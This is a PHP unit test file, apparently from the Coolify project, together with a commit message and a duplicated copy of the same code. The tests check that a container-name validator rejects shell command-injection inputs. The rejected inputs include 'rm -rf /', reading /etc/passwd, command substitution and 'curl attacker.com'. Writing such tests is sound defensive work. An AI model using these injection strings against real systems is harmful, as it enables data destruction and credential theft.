coolify/tests/Unit/UnmanagedContainerCommandInjectionTest.php

<?php

use App\Support\ValidationPatterns;

it('rejects container IDs with command injection characters', function (string $id) {
    expect(ValidationPatterns::isValidContainerName($id))->toBeFalse();
})->with([
    'semicolon injection' => 'x; id > /tmp/pwned',
    'pipe injection' => 'x | cat /etc/passwd',
    'command substitution backtick' => 'x`whoami`',
    'command substitution dollar' => 'x$(whoami)',
    'ampersand background' => 'x & rm -rf /',
    'double ampersand' => 'x && curl attacker.com',
    'newline injection' => "x\nid",
    'space injection' => 'x id',
    'redirect output' => 'x > /tmp/pwned',
    'redirect input' => 'x < /etc/passwd',
]);

it('accepts valid Docker container IDs', function (string $id) {
    expect(ValidationPatterns::isValidContainerName($id))->toBeTrue();
})->with([
    'short hex id' => 'abc123def456',
    'full sha256 id' => 'a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2',
    'container name' => 'my-container',
    'name with dots' => 'my.container.name',
    'name with underscores' => 'my_container_name',
]);
fix(livewire): add input validation to unmanaged container operations Add container name validation and shell argument escaping to startUnmanaged, stopUnmanaged, restartUnmanaged, and restartContainer methods, consistent with existing patterns used elsewhere in the codebase. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> 2026-03-25 19:42:00 +00:00			`<?php`

			`use App\Support\ValidationPatterns;`

			`it('rejects container IDs with command injection characters', function (string $id) {`
			`expect(ValidationPatterns::isValidContainerName($id))->toBeFalse();`
			`})->with([`
			`'semicolon injection' => 'x; id > /tmp/pwned',`
			`'pipe injection' => 'x \| cat /etc/passwd',`
			'command substitution backtick' => 'x`whoami`',
			`'command substitution dollar' => 'x$(whoami)',`
			`'ampersand background' => 'x & rm -rf /',`
			`'double ampersand' => 'x && curl attacker.com',`
			`'newline injection' => "x\nid",`
			`'space injection' => 'x id',`
			`'redirect output' => 'x > /tmp/pwned',`
			`'redirect input' => 'x < /etc/passwd',`
			`]);`

			`it('accepts valid Docker container IDs', function (string $id) {`
			`expect(ValidationPatterns::isValidContainerName($id))->toBeTrue();`
			`})->with([`
			`'short hex id' => 'abc123def456',`
			`'full sha256 id' => 'a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2',`
			`'container name' => 'my-container',`
			`'name with dots' => 'my.container.name',`
			`'name with underscores' => 'my_container_name',`
			`]);`